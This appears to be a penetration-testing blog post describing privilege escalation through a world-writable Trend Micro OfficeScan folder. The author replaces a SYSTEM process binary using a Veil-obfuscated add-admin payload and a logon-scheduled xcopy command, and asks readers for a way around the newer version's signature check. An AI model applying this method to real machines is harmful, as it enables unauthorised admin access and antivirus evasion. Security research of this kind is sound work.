Sécurité

Feedback from a weak file permissions fail

Publié le : Auteur: llaise Laisser un commentaire
antivirus_activado

A few weeks ago, I managed to connect to a patched Windows 7 and with a limited user account (let’s call him « limited_user »). Of course, the goal was to obtain an admin/system shell.

Fail !

After doing all the normal checks, something caught my attention…

File permission fail
File permission fail
Wait... what ?
Wait… what ?

…. Can all the users edit the Trend Micro OfficeScan directory ? Meh, that looks cool. We need to investigate !

Investigation !

Which version is it ?

OfficeScan - Version
OfficeScan – Version

Which services are running by Trend ?

services_trend
Trend/Office Scan Services

Which processes are actually running ?

Process List
Process List

Okay, so the PccNTMon.exe is the Office ScanGUI that is running with my « limited_user »‘s rights, but the other processes are running on SYSTEM. At this point in time, i guessed that it could be cool to create a malicious payload and to place it, in the place of a legit Trend process, no ? But the main problem we are facing is that Office Scan is launched at startup, and we obviously can’t modify/replace a running system process.

wow-that-escalated-quicklyIf we look closer to the list of Trend’s processes, we can see something that’s quite interesting : a process called « CNTAoSMgr.exe » has got « TMlisten » as a parent proces and it starts about 30 sec AFTER TMListen. 30 sec ? Could it be enough to open a session before the process «CNTAoSMgr.exe » starts and … put our payload here ?

Payload time!

First, we need to create a payload that will add a user to the system and also add him to the « Administrateurs » group. However, the payload will be somewhere on the computer, and the anti-virus can catch it. We’ll use the Veil Framework to obfuscate it. (please remember : never send theses payloads to an online scanner !)

Payload created from Veil Framework
Payload created from Veil Framework

Then, i use an up-to-date LOCAL AV to test the file …

Payload isn't detected :)
Payload isn’t detected 🙂

Looks fine:)

Scheduled that !

Second, we’ll create a scheduled task to replace C:\Program Files (x86)\Trend Micro\OfficeScan Client\CNTAoSMgr.exe with our payload. We’re a limited user, so we can’t schedule it when the computer’s start. However, we can create a task that’ll run at the session startup

# Command to schedule (copy payload from desktop to Office Scan Dir)

xcopy "C:\Users\limited_user\Desktop\CNTAoSMgr.exe" "C:\Program Files (x86)\Trend Micro\OfficeScan Client\" /Y
Scheduled task
Scheduled task

 

If we try to run the tasks, it will fail because the process CNRAoSMgr.exe is running. There’s no « admin_user » at this moment.

thank-you-captain-obvious

Pwn time !

Time to reboot, and see what happen !

Before rebooting, the legit CNTAoSMgr.exe looks like that :

before_reboot

After rebooting …

after_payload

After few seconds …

The user is created !
The user is created !
admin_user info
admin_user info

Pwnd =)

Notes !

I tried to do this against an OfficeScan 11, but it failed because the agent checks the digital signature before executing the « .exe ». If someone has a trick to bypass this check, please contact me =)